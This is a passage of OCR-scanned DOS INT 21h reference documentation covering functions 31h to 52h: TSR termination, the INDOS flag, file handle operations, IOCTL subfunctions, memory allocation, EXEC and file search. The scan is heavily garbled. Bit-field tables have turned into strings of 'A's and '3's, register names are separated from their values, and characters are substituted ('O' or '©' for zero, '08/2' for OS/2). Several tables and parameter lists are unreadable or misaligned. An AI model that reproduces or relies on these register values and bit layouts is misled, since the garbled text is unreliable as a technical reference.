- DOS versions prior to DOS 2.0 return zero in AH and AL 

- DOS version 4.0 and 4.1 usually return the same value of 4.00 

- the OEM serial number is a rarity, though some older OEM DOS 
versions implemented this feature 

- the 0S/2 compatibility box returns 10.10 for 0S/2 1.1, 10.20 
for 0S/2 1.2, etc... 

- when testing for version, a specific test can often cause your 


code to not work in following versions of DOS. It is often better 
to test for a version number greater or equal to the minimum rather 


than a specific version number where possible 
- see -DOS Versions- 
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:int 21,31 

NAINT 21,31 - Terminate Process and Remain Resident 
AH = 31h 
AL = exit code (returned to batch files) 
DX = memory size in paragraphs to reserve 
returns nothing 


:int 21, 
NINT 21, 


:int 21, 
NINT 21, 


AH 
AL 


DL 


on 
DL 


preferred method for Terminate and Stay Resident programs 
terminates process without releasing allocated memory and 
without closing open files 

attempts allocation of memory specified in DX from memory 
allocated by DOS at startup. -INT 21,48- memory allocation 
is not affected 


see -INT 27- 

32 

32 - Get Pointer to Drive Parameter Table (Undocumented) 
= 32h 

= drive (0O=default, 1=A:, 2=B:, 3=C:, ...) 

return: 

= FF if the drive number in DL was invalid 

:BX = address of drive parameter table (-DPT-) 


available since DOS 2.0 

used by DOS commands CHKDSK and RECOVER 

forces a media check, which clears byte DS:[BX+17h] or DS:[BX+18h] 
in the Drive Parameter Table 

actually accesses the disk, causing a critical error if a disk 
error OCcurs 

can be used to determine if a drive is SUBST'ed by comparing 
DS:[BX+1] and DS:[BX] for a match. If not equal, then the 

drive is possibly SUBST'ed (though not guaranteed, this may also 
indicate a Bernoulli box) 

can be used to determine if a drive is a RAM disk; if the disk is 
NOT removable and (DS:[BX+1] == ©), then the disk is a RAM disk 
(see -IOCTL,0- bit number OBh to determine if the disk is removable) 
33 

33 - Get/Set System Values (Ctl-Break/Boot Drive) 


00 to get Ctrl-Break checking flag 

01 to set Ctrl-Break checking flag 

02 to set extended Ctrl-Break checking 

05 get boot drive (DOS 4.x) 

00 to set Ctrl-Break checking off 

01 to set Ctrl-Break checking on 

boot drive for subfunction 5; (1=A:, 2=B:, ...) 


return: 
= 00 Ctrl-Break checking OFF (AL=0 or AL=2) 
= 01 Ctrl-Break checking ON (AL=0 or AL=2) 
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= boot drive number (1-26, A: - Z:) (function 05) 


- retrieves DOS Ctrl-Break or extended Ctrl-Break setting which 
determines if DOS will check for Ctrl-Break during INT 21 calls 
:int 21,34:INDOS 
NAINT 21,34 - Get Address to DOS Critical Flag 


AINDOS (Undocumented DOS 2.0+) 
AH = 34h 
on return: 


ES:BX = address of a byte indicating whether a DOS call is 
in progress. No DOS calls should be made if set. 


- AKA the INDOS flag, this critical section flag may be checked from 
within an interrupt handler before requesting a DOS service. It is 
a semaphore that is non-zero when DOS is busy, and zero otherwise. 
- though this flag indicates whether a DOS interrupt is active, it 
should not be used alone to determine DOS is safe for re-entry; 
Here's the standard rule for safe DOS entry: if -INT 28- is active 
or this flag and the critical error flag are clear then it is safe 
to call DOS 
- this interrupt should be used only during TSR initialization; 
the returned pointer should be used thereafter 
- this flag is cleared after a critical error (-INT 24-) 
- ES:BX-1 points to the critical error flag for DOS 3.x+ 
ES:BX+1 points to the critical error flag for DOS 2.x 
ES:BX-1AA points to the critical error flag for COMPAQ DOS 3.0 
-INT 21,5D- in DOS 3.x+ can be used to locate the critical 
error flag 
:int 21,35 
NAINT 21,35 - Get Interrupt Vector 


AH = 35h 
AL = interrupt vector number 
on return: 


ES:BX = pointer to interrupt handler 
- standard method for retrieving interrupt vectors 
- see -INT 21,25- 


:int 21,36 
AINT 21,36 - Get Disk Free Space 


AH = 36h 
DL = drive number (0=default, 1=A:) 
on return: 
AX = sectors per cluster 
= FFFF if drive is invalid 
BX = number of available clusters 
CX = number of bytes per sector 
DX = number of clusters per drive 
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- used to determine available space on specified disk 
- see -INT 21, 1B-  -INT 21,1C- 


:int 21,37 
NAINT 21,37 - Get/Set Switch Character (Undocumented, DOS 2.0+) 


AH = 37h 
AL = 0 get switch character into DL; some systems return "-" 
= 1 set switch character to value in DL 
= 2 read device prefix flag into DL; returns DL = 0 indicating 
devices must be accessed using /DEV/device. A non-zero value 
indicates devices may be accessed without prefix 
= 3 set device prefix flag, device names must begin with \DEV\. 
DL = new switch character (AL=1) 
= 00 \DEV\ must preceed device names (AL=3) 
= 01 \DEV\ is not neccesary in device names (AL=3) 
on return 
AL = FF illegal subfunction code specified 
DL = current switch character (AL=0) 


device availability (AL=2, always FF with DOS 4.x+) 


- subfunctions 0 and 1 were formerly available as a CONFIG.SYS 


command in DOS versions before 3.x; also supportedin the 08/2 
compatibility box 
- subfunctions 2 and 3 were available in DOS 2.x only; they have 


no effect in DOS 4.x+ 
- /DEV/ prefix is valid in DOS 2.x by default, setting the flag makes 
it mandatory. DOS internal commands like DIR, TYPE and DEL do not 
recognize filenames the are identical to device names regardless of 
the setting of the AVAILDEV flag. 
:int 21,38 
NAINT 21,38 - Get/Set Country Dependent Information 


AH = 38h 
AL = 00 to get current country information 
= 00-FE country codes (DOS 3.x+) 
= FF for country codes >= FF, country codes are in BX 
BX = country code if AL = FF (country code > 255) 
DX = FFFF to set country information 
DS:DX = pointer to buffer to contain country data (if get data) 
on return: 
AX = error code if CF set 
= 02 invalid country 
BX = country code (DOS 3.x+) 


DS:DX = pointer to returned country data (see -COUNTRY CODES-) 


- returns a pointer to country specific data, for DOS 3.x+ this 
function can be used to also set this information 
:int 21,39 
NAINT 21,39 - Create Subdirectory (mkdir) 


AH = 39h 
DS:DX = pointer to ASCIIZ path name 
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on return: 


CF = 0 if successful 
= 1 if error 
AX = error code (see -DOS ERROR CODES-) 


- creates specified subdirectory 
- returns error if directory already exists, element of the path 
is not found, directory full or write protected disk 


:int 21,3a 
NAINT 21,3A - Remove Subdirectory (rmdir) 


AH = 3A 
DS:DX = pointer to ASCIIZ path name 


on return: 

CF 0 if successful 

1 if error 

error code (see -DOS ERROR CODES-) 


AX 


- allows deletion of a subdirectory as long as it exists, is empty 
and not the current directory 


:int 21,3b 
AINT 21,3B - Change Current Directory (chdir) 


AH = 3B 
DS:DX = pointer to ASCIIZ path name 


on return: 

CF O if successful 

1 if error 

error code if CF set (see -DOS ERROR CODES-) 


AX 


- changes the current directory to the directory specified 
by pointer DS:DX 


sint 21,3cC 
NINT 21,3C - Create File Using Handle 


3C 
file attribute (see —-FILE ATTRIBUTES-) 
DS:DX = pointer to ASCIIZ path name 


on return: 

O if successful 

1 if error 

files handle if successful 

error code if failure (see -DOS ERROR CODES-) 


- if file already exists, it is truncated to zero bytes on opening 
:int 21,3d 
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AINT 21,3D - Open File Using Handle 


AH 
AL 


3D 

open access mode 

00 read only 

01 write only 

02 read/write 

DS:DX = pointer to an ASCIIZ file name 


on return: 
AX file handle if CF not set 
error code if CF set (see -DOS ERROR CODES-) 


% Access modes in AL: 


37363534333231303 AL 

3 3 3 3 3 AAAAAAAAA read/write/update access mode 

3308 -ARAAAAIAAN peSCTVEUI A WAVS O 

A RAI <harino node («ee ’belon) (008 s116) 
\AAAARAAAARAAARA 1 = orivate 0 2 ‘inielttable (0098 10) 


% Sharing mode bits (DOS 3.1+): Access mode bits: 

% 654 210 
000 compatibility mode (exclusive) 000 read access 
001 deny others read/write access 001 write access 
010 deny others write access 010 read/write access 


011 deny others read access 
100 full access permitted to all 


- will open normal, hidden and system files 
- file pointer is placed at beginning of file 


:int 21,3e 
NINT 21,3E - Close File Using Handle 


AH = 3E 
BX = file handle to close 
on return: 


AX = error code if CF set (see -DOS ERROR CODES-) 


- if file is opened for update, file time and date stamp 
as well as file size are updated in the directory 
- handle is freed 


:int 21,3f 
NAINT 21,8F - Read From File or Device Using Handle 


AH = 3F 
BX = file handle 
CX = number of bytes to read 


DS:DX = pointer to read buffer 


on return: 
AX = number of bytes read is CF not set 
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= error code if CF set € (see -DOS ERROR CODES-) 


- read specified number of bytes from file into buffer DS:DX 

- when AX is not equal to CX then a partial read occurred due 
to end of file 

- if AX is zero, no data was read, and EOF occurred before read 


:int 21,40 
NAINT 21,40 - Write To File or Device Using Handle 


AH = 40h 
BX = file handle 
CX = number of bytes to write, a zero value truncates/extends 


the file to the current file position 
DS:DX = pointer to write buffer 


on return: 
AX number of bytes written if CF not set 
error code if CF set (see -DOS ERROR CODES-) 


- if AX is not equal to CX on return, a partial write occurred 
- this function can be used to truncate a file to the current 
file position by writing zero bytes 
:int 21,41 
NAINT 21,41 - Delete File 


AH = 41h 
DS:DX = pointer to an ASCIIZ filename 


on return: 
AX = error code if CF set (see DOS ERROR CODES) 


- marks first byte of file directory entry with E5 to indicate 
the file has been deleted. The rest of the directory entry 
stays intact until reused. -FAT- pointers are returned to DOS 

- documented as not accepting wildcards in filename but actually 
does in several DOS versions 

:int 21,42 
NAINT 21,42 - Move File Pointer Using Handle 


AH = 42h 

AL = origin of move: 
00 = beginning of file plus offset (SEEK_SET) 
01 = current location plus offset (SEEK_CUR) 
02 = end of file plus offset (SEEK_END) 

BX = file handle 

CX = high order word of number of bytes to move 

DX = low order word of number of bytes to move 

on return: 


AX = error code if CF set (see -DOS ERROR CODES-) 
DX:AX = new pointer location if CF not set 
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- seeks to specified location in file 
sint 21,43 
NINT 21,43 - Get/Set File Attributes 


AH 
AL 


43h 

00 to get attribute 

01 to set attribute 

DS:DX = pointer to an ASCIIZ path name 
CX = attribute to set 


3534333231303 CX valid file attributes 
3 s 3 s 3 AAAAA 1 = read only 

lea e Oi a Figli 

Lu \AARARA 1 = a 

3 AAAAAAAAAA not used for this call 


AAAAAAAAAAA 1 = archive 


on return: 
error code if CF set (see -DOS ERROR CODES-) 
the attribute if AL was 00 


- see -DIRECTORY- 


:int 21,44 
AINT 21,44 - I/0 Control for Devices (IOCTL) 
% Standard Call Format 
AH = 44h 
AL = function value 
BX = file handle 
BL = logical device number (0O=default, 1=A:, 2=B:, 
CX = number of bytes to read or write 


DS:DX = data or buffer 


on return: 
AX = error code if CF set 
AX = # of bytes transferred if CF not set 


% For more information, see the following topics: 


-IOCTL, 0- Get Device Information 
-IOCTL,1- Set Device Information 
-IOCTL,2- Read From Character Device 
-IOCTL,3- Write to Character Device 
-IOCTL,4- Read From Block Device 
-IOCTL, 5- Write to Block Device 
-IOCTL, 6- Get Input Status 

-IOCTL,7- Get Output Status 

-IOCTL,8- Device Removable Query 
-IOCTL,9- Device Local or Remote Query 
-IOCTL, A- Handle Local or Remote Query 
-IOCTL,B- Set Sharing Retry Count 
-IOCTL,C- Generic I/0 for Handles 
-IOCTL, D- Generic 1/0 for Block Devices (3.2+) 
-IOCTL,E- Get Logical Drive (3.2+) 
-IOCTL,F- Set Logical Drive (3.2+) 


- see: -DEVICE COMMAND CODES- 
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-DEVICE REQUEST HEADER- 
-DEVICE STATUS- 

-DEVICE HEADER- 

-DEVICE ATTRIBUTES- 


sint 21,44, 0:IOCTL,0 
NINT 21,44,0 / IOCTL,0 - Get Device Information 


AH = 44h 
AL = 00 
BX = handle (must be an opened device) 
on return 
AX = error code if CF set (see -DOS ERROR CODES-) 
DX = device information (see tables below) 
3F3E3D3C3B3A-8373635-03 DX Block Device Information 
3 3 3 33 3 3 s° AAAAAA drive number (0=A:,1=B:) 
3 3 3 3 3 3 3 AAAAAAAA 0 = file has been written 
3 s 33 3 3 AAAAAAAAA 0 = disk file; 1 = character device 
3 3 3 3 3 AAAAAAAAARA reserved, must be zero 
3 s 3 3 AAAAAAAAAAAAA 1 = media not removable 
3 3 3 AAAAAAAAAAAAAKA 1 = network device (DOS 3.x+) 
3 3 AAAAAAAAAAAAAAA 1 = reserved 
3 AAAAAAAAAAAKAAAAA 1 = don't update file time or date (DOS 4.x+) 


NARAAARAAARAAARRA 1 API is remote (DOS 3.x+) 


3F3E3D3C3B3A-837363534333231303 DX Character Device Information 
3 3 3 33 3. 3 3 3 3 s 3 3 AAAAA 1 = standard input device 

3 3 3 3 3 3° 3 3 3 3 s 3 AAAAA 1 = standard output device 

3 3 33 3 3 3 3 3 3 3 AAAAA 1 = NUL device 

3 3 3 3 3 3 3 3 3 3 AAAAA 1 = clock device 

3 3 3 3 3 3 3 3 3 AAAAA uses DOS -INT 29- for fast character output 
3 3 3 33 3 3 s AAAAA 1 = binary mode, 0 = translated 

3 3 3 3 3 3 3 AAAAA 0 = end of file on input 

3 3 33 3 3 AAAAA 1 = character device, 0 if disk file 

3 s 3 s 3 AAAAAA reserved 

3 s 3 3 AAAAAAA 1 = media not removable 

3 3 3 AAAAAAA 1 = network device (DOS 3.x+) 

3 3 AAAAAAA reserved 

3 


AAAAAAA 1 = supports IOCTL, via functions 2 & 3 
AAAAAAA reserved 


- BIT 7 of register DX can be used to detect if STDIN/STDOUT is 
redirected to/from disk; if a call to this function has DX BIT 7 
set it's not redirected from/to disk; if it's clear then it is 
redirected to/from disk 

- BIT B of register DX can be used to determine if a drive is 
removable. 


‘int 21,44,1:IOCTL,1 
NINT 21,44,1 / IOCTL,1 - Set Device Information 


AH = 44h 

AL = 01 

BX = handle 

DH = must be zero 

DL = device data low order byte (see below) 
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on return 
AX = error code if CF set 
DX = device information (see below) 


- applicable to character devices only 

- allows setting of device data word for character devices 
- usually used to change from binary to translated 1/0 

- handle in BX must be an opened file or device 


ADevice Data Word 


w 


WWW W tw W W WwITI 
w 


WoW Www ww wi 
w 


WU WU WU W dW W wW w(A0I 
(S) 


Wo W W W WWW ww 
w 


WWW WV WV vd Www 
w 


WU WU WU W dW W WwW w (0 
w 


WU WU WU W cd GW w w 0 
(S) 


363 


534333231303 Device Data Word 

3 3 3 3 3 AAAAA 1 = standard input device 
3 3 3 3 AAAAA 1 = standard output device 
3 3 3 AAAAA 1 = NUL device 

3 3 AAAAA 1 = clock device 

3 AAAAA reserved 

AAAAA 1 = binary mode, 0 = translated 
AAAAA © = end of file on input 

AAAAA 1 = character device 
AAAAAAAAAAAAAAAAAAA reserved, must be zero 


736 
3 3 
3 3 
3 3 
3 3 
3 3 
3 3 
3 


Wo W W W WWW wWTI 


sint 21,44,2:IOCTL,2 
NINT 21,44,2 / IOCTL,2 - Read From Character Device 


AH = 44h 

AL = 02 

BX = handle 

CX = number of bytes to read 


DS:DX = pointer to data buffer 


on return 
AX number of bytes read if CF clear 
error code if CF set (see -DOS ERROR CODES-) 


- see bit 14 if IOCTL function 00h to determine if 
driver can support IOCTL control strings 


‘int 21,44,3:IOCTL,3 
NINT 21,44,3 / IOCTL,3 - Write to Character Device 


AH = 44h 

AL = 03 

BX = handle 

CX = number of bytes to send 


DS:DX = pointer to data buffer 


on return 
number of bytes written if CF clear 
error code if CF set (see -DOS ERROR CODES-) 


- see bit 14 if IOCTL function 00h to determine if 
driver can support IOCTL control strings 
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sint 21,44,4:IOCTL,4 
NINT 21,44,4 / IOCTL,4 - Read from Block Device 


AH = 44h 

AL = 04 

BL = drive number (0=default, 1=A:, 2=B:, 3=C:, ...) 
CX = number of bytes to read 


DS:DX = pointer to data buffer 


on return 
AX = number of bytes read if CF clear 
= error code if CF set (see -DOS ERROR CODES-) 


- block drivers are not required to support this function 
- returns AX = 01 (invalid function code) if not supported 


sint 21,44,5:IOCTL,5 
NINT 21,44,5 / IOCTL,5 - Write to Block Device 


AH = 44h 

AL = 05 

BL = drive number (0=default, 1=A:, 2=B:, 3=C:, ...) 
CX = number of bytes to send 


DS:DX = pointer to data buffer 


on return 
AX number of bytes written if CF clear 
error code if CF set (see -DOS ERROR CODES-) 


- block devices are not required to support this function 
- returns AX = 01 (invalid function code) if not supported 


‘int 21,44,6:IOCTL,6 
NINT 21,44,6 / IOCTL,6 - Get Input Status 


AH = 44h 
AL = 06 
BX = handle 
on return 
CF = 0 if successful 
= 1 if error 
AX = error code if CF set (see -DOS ERROR CODES-) 
AL = 00 if EOF (files), or not ready (char devices) 


FF if not EOF (files), or ready (char devices) 

- used to determine if a file or device is ready for input 

- can be used to determine EOF unless EOF caused by -INT 21,42- 
:int 21,44,7:IOCTL,7 
NINT 21,44,7 / IOCTL,7 - Get Output Status 

AH = 44h 
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AL = 07 
BX = handle 
on return 
CF = 0 if successful 
= 1 if error 
AX = error code if CF set (see -DOS ERROR CODES-) 
AL = 00 if ready (files), or not ready (char devices) 


‘int 21, 
NINT 21, 


:int 21, 
NINT 21, 


FF ready (files or char device) 


indicates if a device or file is ready for output 
files always return ready, character devices don't 


44,8:IOCTL,8 
44,8 / IOCTL,8 - Device Removable Query 


08 
drive number (©O=default, 1=A:, 2=B:, 3=C:, ...) 


return 

O if successful 

1 if error 

00 removable media 

©1 non-removable media 

error code if CF set (see -DOS ERROR CODES-) 


used to determine if a device supports removable media 

RAM disks are not considered removable media 

device drivers compatible with DOS 2.0 do not always respond 
correctly to this query 

implemented from DOS 3.0; for earlier DOS versions drive A: and 
B: are removable media since DRIVER.SYS/SUBST are DOS 3.0+ only 


44,9:IOCTL,9 

44,9 / IOCTL,9 - Device Local or Remote Query 

= 44h 

= 09 

= drive number (0=default, 1=A:, 2=B:, 3=C:, ...) 
return 

= error code if CF set (see -DOS ERROR CODES-) 

= device attribute word 


bit 12 = 1 if drive is remote 
bit 12 = 0 if drive is local 


- used to determine if block device is local or remote 


returns invalid function if networking not started 


- implemented from DOS 3.1 


sint 21,44, a:IOCTL,a 
AINT 21,44,A / IOCTL,A - Handle Local or Remote Query 


AH 
AL 
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44h 
OA 


991 


BX = handle 


on return 

error code if CF set (see -DOS ERROR CODES-) 
device attribute word 

bit 15 = 1 if drive is remote 

bit 15 = 0 if drive is local 


- used to determine if block device is local or remote 
- returns invalid function if networking not started 
- implemented from DOS 3.1 


‘int 21,44,b:IOCTL,b 
AINT 21,44,B / IOCTL,B - Set Sharing Retry Count 


AH = 44h 

AL = OB 

CX = pause between retries (default 1) 
DX = number of retries (default 3) 

on return 


AX = error code if CF set (see -DOS ERROR CODES-) 


- retry parameters are associated with file locking 

- differences in CPU and clock speeds affect length of pauses 
- requires SHARE be loaded or invalid function is returned 

- implemented from DOS 3.0 


sint 21,44,c:IOCTL,c 
NAINT 21,44,C / IOCTL,C - Generic I/0 for Handles 


AH = 44h 
AL = 0C 
BX = handle 
CH = device type 
= 00 unknown device type (DOS 3.3+) 
= 01 COMx (DOS 3.3+) 
= 03 CON (DOS 3.3+) 
= 05 LPTx (DOS 3.3+), printer (DOS 3.2) 
CL = minor function code (when CH = 3 or CH = 5) 


45 set iteration count (DOS 3.2 only) 


4A select code page (DOS 3.3+); parameter format: 
00 word length of data 
02 word code page ID 
04 nwords character set data array (see offset 00) 


= 4C code page prepare start (DOS 3.3+); parameter format: 
00 word flags 
02 word length of remainder of parameter block 
04 word number of code pages following 
06 nwords code page 1,...,N 


= 4D code page prepare end (DOS 3.3+); parameter format: 
00 word length of data 
02 word code page ID 


5F set display info (DOS 4.x, when CH=3); parameter format: 
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00 byte 


01 byte 
02 word 
04 word 


level (0 for DOS 4.0) 
reserved 

length of following data 
control flags 


bit 0 set for blink, clear for intensity 
bits 1 to 15 reserved 


06 byte 
07 byte 
08 word 
OA word 
OC word 
OE word 
10 word 


mode type (1=text, 2=graphics) 

reserved 

colors; ©=monochrome, n=bits per pixel 
pixel columns 

pixel rows 

character columns 

character rows 


65 get iteration count (DOS 3.2 only) 


= 6A query selected code page (DOS 3.3+); parameter format: 


00 word 
02 word 
04 nwords 


00 word 
02 word 
04 nwords 
XX word 
xx nwords 


00 byte 
01 byte 
02 word 
04 word 
06 byte 
07 byte 
08 word 
OA word 
OC word 
OE word 
10 word 

DS:DX = 

on return 


length of data 
code page ID 
character set data array (see offset 00) 


6B query prepare list (DOS 3.3+); Parameter format: 


length of following data 
number of hardware code pages 
hardware code page array 
number of prepared code pages 
prepared code page array 


7F. get display info (DOS 4.x, CH = 3) 


level (0 for DOS 4.0) 

reserved 

length of following data 

control flags 

bit 0 set for blink, clear for intensity 
bits 1 to 15 reserved 

mode type (1=text, 2=graphics) 

reserved 

colors; ©=monochrome, n=bits per pixel 
pixel columns 

pixel rows 

character columns 

character rows 


pointer to iteration count word (DOS 3.2) 
pointer to parameter block (DOS 3.3) 


AX = error code if CF set (see -DOS ERROR CODES-) 


- iteration count word specifies the number of times to retry 
an operation before aborting 

- DOS 3.3 changed this function to handle code page switching 

- implemented from DOS 3.2 

- DOS 4.x adds support for double byte characters 

- see IBM DOS Technical Reference Manual for more details 


:int 21,44,d:IOCTL,d 


NINT 21,44,D / IOCTL,D - Generic 1/0 for Block Devices 


AH 
AL 


44h 
OD 
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BL 
CH 


drive number (©O=default, 1=A:, 2=B:, 3=C:, ...) 
device type 

08 for disk drive (block device) 

minor function code 

40 set device parameters 

41 write track on logical device 

42 format/verify track on logical drive 
47 set access flag (DOS 4.x) 

60 get device parameters 

61 read track on logical device 

62 verify track on logical drive 

67 get access flag (DOS 4.x) 

= pointer to parameter block 


CL 


DS: 


7 
x 


on return 
AX = error code if CF set (see -DOS ERROR CODES-) 


- provides device independent primitive control operations 
- implemented from DOS 3.2 
- see IBM DOS Technical Reference Manual for more details 


:int 21,44,e:IOCTL,e 
AINT 21,44,E / IOCTL,E - Get Logical Drive 


AH = 44h 

AL = 0E 

BL = physical drive number (0O=default, 1=A:, 2=B:, 3=C:, 
on return 

AX = error code if CF set (see -DOS ERROR CODES-) 

AL logical drive number assigned to physical drive 


0 if drive accessed by only one drive specifier 
1 if drive A:, 2 if drive B:, etc 


- used to determine the last drive designator used to access 
a drive if more than one logical drive designation applies 
to a device 

- implemented from DOS 3.2 


sint 21,44,f:IOCTL,f 
NAINT 21,44,F / IOCTL,F - Set Logical Drive 


AH = 44h 

AL = OF 

BL = new drive number (©0=default, 1=A:, 2=B:, 3=C:, ...) 
on return 

AX = error code if CF set (see -DOS ERROR CODES-) 

AL logical drive number (should be equal to BL input) 


O if drive accessed by only one drive specifier 
1 if drive A:, 2 if drive B:, etc 


- changes the logical drive designator of the physical drive 
to be accessed next 
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- implemented from DOS 3.2 


:int 21,45 
AINT 21,45 - Duplicate File Handle 


AH = 45h 

BX = file handle 

on return: 

AX new file handle if CF not set 


error code if CF set (see -DOS ERROR CODES-) 


- gets another file handle for the same file 

- both file handles move in unison 

- often used to flush file data and update a file directory 
entry without closing the initial file 


:int 21,46 
NAINT 21,46 - Force Duplicate File Handle 


AH = 46h 

BX = existing file handle 
CX = second file handle 
on return: 


AX = error code if CF set (see -DOS ERROR CODES-) 


- if file handle in CX is currently open, current file 
identified by CX is closed and the handle in BX is 
dupped and placed in CX 

- after duping file handles move together through file 

- similar to -INT 21, 45- 


:int 21,47 
AINT 21,47 - Get Current Directory 


47h 
drive number (0 = default, 1 = A:) 
DS:SI = pointer to a 64 byte user buffer 


on return: 
DS:SI = pointer ASCIIZ directory path string 
AX = error code if CF set (see -DOS ERROR CODES-) 


- returns the current directory relative to the root directory 
- the leading slash "\" and drive designator are omitted 


‘int 21,48 
AINT 21,48 - Allocate Memory 
AH = 48h 
BX = number of memory paragraphs requested 
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AX 


return: 
segment address of allocated memory block (MCB + 1para) 
error code if CF set (see -DOS ERROR CODES-) 


BX size in paras of the largest block of memory available 
if CF set, and AX = 08 (Not Enough Mem) 
CF O if successful 


:int 21, 
NINT 21, 


AH 
ES 


on 
AX 


:int 21, 
NINT 21, 


:int 21, 
NINT 21, 


AH 
AL 


1 if error 


returns segment address of allocated memory block AX:0000 
each allocation requires a 16 byte overhead for the -MCB- 
returns maximum block size available if error 


see -INT 21,49-, -INT 21,4A- 
49 
49 - Free Allocated Memory 

= 49h 

= segment of the block to be returned (-MCB- + ipara) 
return: 

= error code if CF set (see -DOS ERROR CODES-) 


releases memory and MCB allocated by -INT 21,48- 

may cause unpredictable results is memory wasn't allocated using 
INT 21,48 or if memory wasn't allocated by the current process 
checks for valid MCB id, but does NOT check for process ownership 
care must be taken when freeing the memory of another process, to 
assure the segment isn't in use by a TSR or ISR 

this function is unreliable in a TSR once resident, since 

COMMAND .COM and many other .COM files take all available memory 
when they load 

see INT 21, 4A 

4a 

4A - Modify Allocated Memory Block (SETBLOCK) 


4A 
new requested block size in paragraphs 
segment of the block (-MCB- + 1 para) 


return: 
= error code if CF set (see -DOS ERROR CODES-) 
= maximum block size possible, if CF set and AX = 8 


modifies memory blocks allocated by -INT 21,48- 

can be used by programs to shrink or increase the size 

of allocated memory 

PC-DOS version 2.1 and DOS 3.x will actually allocate the largest 
available block if CF is set. BX will equal the size allocated. 
see also -—INT 21,49- 

4b:exec function 

4B - EXEC/Load and Execute Program 


4B 

00 to load and execute program 

01 (Undocumented) create program segment prefix and load 
program, but don't execute. The CS:IP and SS:SP of the 
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program is placed in parameter block. Used by debuggers 
03 load program only 
04 called by MSC spawn() when P_NOWAIT is specified 
X = pointer to an ASCIIZ filename 
X = pointer to a parameter block 


\®) 
v 
VO Il Il 


on return: 
AX = error code if CF set (see -DOS ERROR CODES-) 
ES:BX = when AL=1, pointer to parameter block similar to: 


% Offset Size Description 


00 word when AL=1, segment of env. or zero if using parents env. 
word when AL=3, segment of load point for overlay 

02 dword when AL=1, pointer to cmd line at PSP 80h 
word when AL=3, relocation factor for EXE overlay 

06 dword pointer to default -FCB- passed at -PSP- 5Ch 

OA dword pointer to default FCB passes at PSP 6Ch 

OE dword value of program SS:SP 

12 dword value of program CS:IP 


- allows execution of an external program as well as overlay 
management from within an application 

- all registers except CS and IP are destroyed 

- SS and SP should be preserved in code segment before call 
since a bug in DOS version 2.x destroys these 

- return code can be retrieved if child process exits via -INT 21,4C- 

- calling process must assure presence of enough unallocated memory 

- subfunction 4 returns with an error under DOS 4.x+ 

- calls -INT 21,55- 


- see also -INT 21,26- 
sint 21,4cC 
NAINT 21,4C - Terminate Process With Return Code 


AH 
AL 


4C 
return code (for batch files) 


returns nothing 


- approved method of program termination 

- restores the terminate, -Ctrl-Break-, and critical error exit 
addresses, flushes all buffers, frees memory and returns to 
DOS via the termination handler address 

- does not close FCBs 

- this function is not supported in versions of DOS before 2.x, 
so use -INT 21,0- or -INT 20- to exit. 


- see also -INT 27- -INT 21,31- 


:int 21, 4d 
AINT 21,4D - Get Return Code of Sub-process 
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on 
AH 


AL 


return: 

system exit code (indicates normal termination) 
00 for normal termination 

01 if terminated by ctl-break 

02 if critical device error 

03 if terminated by -INT 21,31- 

child exit code 


retrieve child process and system exit codes 
this function can only be used to retrieve the exit code once 
multiple attempts to read exit codes will cause errors 


:int 21,4e 


% 


NAINT 21,4E - Find First Matching File 
AH = 4E 
CX = attribute used during search (see -FILE ATTRIBUTES-) 
DS:DX = pointer to ASCIIZ filespec, including wildcards 
on return: 
AX = error code if CF set (see -DOS ERROR CODE-) 
-DTA- = data returned from call in the format: 
Offset Size Description 
00 byte attribute of search (undocumented) 
byte drive letter used in search (DOS 3.1-4.x, undocumented) 
01 byte drive letter used in search (undocumented) 


1ibytes search name used (DOS 3.1-4.x, undocumented) 

02 11bytes search name used (undocumented) 

OC byte attribute of search (DOS 3.1-4.x, undocumented) 

OD word directory entry number (0 based, undocumented) 

OF word starting cluster number of current directory; zero 
for root directory (DOS 3.2+, undocumented) 

dword pointer to DTA (DOS 2.x-3.1, undocumented) 

11. word reserved 

13. word starting cluster number of current directory; zero 
for root directory (DOS 2.x+, undocumented) 

15 byte attribute of matching file 

16 word file time (see -FILE ATTRIBUTES-) 

18. word file date (see FILE ATTRIBUTES) 

1A word file size 

1E 13bytes ASCIIZ filename and extension in the form NAME.EXT 
with blanks stripped 


returns information on first file matching specifications 

use -INT 21,4F- to retrieve following file matches 

DOS 2.x cannot find . and .. entries, while DOS 3.x can unless 
they represent the root directory 

character devices return a zero for size, time and date in DOS 2.x, 
while DOS 3.0 returns a 40h attribute and current time and date. 
multiple calls to this function with a character device will 
result in unpredictable results 

normal files are always included along with files that match the 
requested attributes except when the LABEL attribute is requested. 
DOS 2.x returns all normal files when label is specified but 3.x 
doesn't. It's up to the programmer to determine which actually 
match the requested attributes. 

bit 8 of CX (file attributes) indicates Novell Netware shareable 
see INT 21, 1A 
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‘int 21, 4f 
AINT 21,4F - Find Next Matching File 


AH = 4F 
DS:DX = unchanged from previous function 4E 


on return: 
AX = error code if CF set (see -DOS ERROR CODES-) 


- «INT 21,4E- should be called to find the first file and this 
function should be called to find all other matching files 

- normal files are always included along with files that match 
the requested attributes except when the LABEL attribute is 
requested. It's up to the programmer to determine which 
actually match the requested attributes. 

- see -INT 21, 1A- -DTA- -FILE ATTRIBUTES- 


:int 21,50 
AINT 21,50 - Set Current Process ID (Undocumented DOS 2.x) 


AH 
BX 


50h 
process ID number (process -PSP- segment address) 


returns nothing 


- the process ID number is actually the segment address of a 
program's PSP. This is useful for TSR's to access their own 
file handle table inside their PSP. 

- this function cannot be called while in an -INT 28- handler in 
DOS 2.x unless the critical error flag is set or stack corruption 
will occur 

- safe in DOS 3.x INT 28 handlers since they use a different stack 


by default 
- available in 0S/2 compatibility box 
- see -INT 21,51-  -INT 21,62- 
:int 21,51 
AINT 21,51 - Get Current Process ID (Undocumented DOS 2.x) 
AH = 51h 
on return: 


BX = process ID 


- The process ID number is actually the segment address of program's 
PSP. This in conjunction with -INT 21,50- is useful for TSR's to 
access their own file handle table in their respective -PSP-. 

- this function cannot be called while in an -INT 28- handler in 
DOS 2.x unless the critical error flag is set or stack corruption 
will occur 

- -INT 21,62- is highly recommended for DOS 3.x due to a possible bug 
when activated from a TSR. DOS may switch to the wrong internal 
stack which may cause a problems with TSR's if called during an 
INT 28. 

- see INT 21,62 (Get PSP segment) for DOS 3.x applications 
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:int 21,52: INVARS 
NAINT 21,52 - Get Pointer to DOS "INVARS" (Undocumented) 


AH = 52h 


on return: 
ES:BX = pointer to DOS "invars", a table of pointers used by DOS. 
Known "invars" fields follow (varies with DOS version): 


% Offset Size Description 


-12. word sharing retry count (DOS 3.1-3.3) 

-10 word sharing retry delay (DOS 3.1-3.3) 

-8 dword pointer to current disk buffer (DOS 3.x) 

